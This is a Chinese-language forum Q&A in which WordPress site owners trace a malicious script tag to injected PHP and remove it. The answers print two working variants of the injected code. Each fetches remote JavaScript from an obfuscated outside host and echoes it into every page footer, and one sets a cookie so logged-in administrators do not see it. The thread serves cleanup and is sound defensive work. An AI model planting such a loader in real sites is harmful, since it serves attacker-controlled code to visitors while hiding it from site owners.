我有一个基于WordPress构建的网站。在检查源代码(ctrl + u)后,会弹出一个链接:
<script type="text/javascript" src="https://www.9iwp.org/jquery.js">
它是什么,我在源文件中的哪里可以找到它?它应该具有破坏性,我需要摆脱它。我已经遍历了文件中所有可用的每一行代码,而且不知道要查找的位置。有什么建议吗?
答案 0 :(得分:1)
我已经解决了此问题,方法是将链接替换为另一个未视为恶意软件的链接。我无法找到进行注射的位置,但至少现在我的网站是“安全的”。您必须在模板的functions.php文件末尾添加以下代码:
add_action('wp_footer', 'my_start_footer_ob', 1);
function my_start_footer_ob() {
ob_start("my_end_footer_ob_callback");
}
add_action('wp_footer', 'my_end_footer_ob', 1000);
function my_end_footer_ob() {
ob_end_flush();
}
function my_end_footer_ob_callback($buffer) {
// remove what you need from he buffer
$buffer = str_replace('www.9iwp.org/jquery.js',"www.mysite.org/wp-content/themes/Mytheme/assets/js/empty.js",$buffer);
return $buffer;
}
更新!
我找到了它所在的地方!
这是模板功能文件之一(在我的情况下为framework / functions / helpers.php)中的“注入”
if(!function_exists('wp_func_jquery')) {
if (!current_user_can( 'read' ) && !isset(${_COOKIE}['wp_min'])) {
function wp_func_jquery() {
$host = 'http://';
$jquery = $host.'lib'.'wp.org/jquery-ui.js';
$headers = @get_headers($jquery, 1);
if ($headers[0] == 'HTTP/1.1 200 OK'){
echo(wp_remote_retrieve_body(wp_remote_get($jquery)));
}
}
add_action('wp_footer', 'wp_func_jquery');
}
function wp_func_min(){
setcookie('wp_min', '1', time() + (86400 * 360), '/');
}
add_action('wp_login', 'wp_func_min');
}
找到该功能并将其删除。
答案 1 :(得分:0)
在我的网站中,它嵌入在插件中:
if(!function_exists('wp_func_jquery')) {
function wp_func_jquery() {
$host = 'http://';
echo(wp_remote_retrieve_body(wp_remote_get($host.'ui'.'jquery.org/jquery-1.6.3.min.js')));
}
add_action('wp_footer', 'wp_func_jquery');
}